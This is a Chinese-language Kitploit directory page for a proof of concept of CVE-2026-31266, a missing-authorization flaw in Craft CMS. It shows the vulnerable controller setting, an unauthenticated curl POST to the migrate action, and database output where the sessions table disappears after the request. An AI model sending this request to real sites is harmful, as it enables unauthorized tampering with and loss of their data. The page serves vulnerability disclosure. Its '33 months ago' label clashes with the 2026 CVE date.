Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Craftcms-PoC-CVE-2026-31266 — 关于Craft CMS认证机制的安全研究。 | Kitploit
工具/GitHubGitHub/0xrixet/craftcms-poc-cve-2026-31266
身份验证与授权漏洞分析漏洞利用Web应用程序漏洞利用渗透测试身份验证
GitHub0xrixet/craftcms-poc-cve-2026-31266

Craftcms-PoC-CVE-2026-31266

关于Craft CMS认证机制的安全研究。

查看仓库
33个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-31266 - Craft CMS 缺少授权

CVE 信息

字段值
CVE IDCVE-2026-31266
供应商Pixel & Tonic
产品Craft CMS
受影响版本<= 5.9.5
CWECWE-862 (缺少授权)
CVSS7.3 (High)
安全研究员0xRIXET

证据内容

  • screenshots/ - 概念验证演示

漏洞

  • 类型: 缺少授权
  • 影响: 认证绕过
  • 供应商: Craft CMS
  • 状态: CVE-2026-31266

漏洞代码

文件: src/controllers/AppController.php

行 65-68:

root@kitploit:~
protected array|bool|int $allowAnonymous = [
    'migrate' => self::ALLOW_ANONYMOUS_LIVE | self::ALLOW_ANONYMOUS_OFFLINE,
];

概念验证

root@kitploit:~
# 当 allowAdminChanges=false 时
curl -X POST "http://target/actions/app/migrate"

证据

攻击前:

root@kitploit:~
mysql> SELECT COUNT(*) FROM sessions;
+----------+
| COUNT(*) |
+----------+
|        0 |
+----------+

攻击后:

root@kitploit:~
mysql> SELECT COUNT(*) FROM sessions;
ERROR 1146 (42S02): Table 'sessions' doesn't exist

参考

  • Craft CMS 仓库
  • Craft 安全文档
  • NVD 条目

联系

  • 安全研究员: 0xRIXET | Mohammed Al-shehri
  • Twitter | X : @0xRIXET
  • 电子邮件: [email protected]
下载工具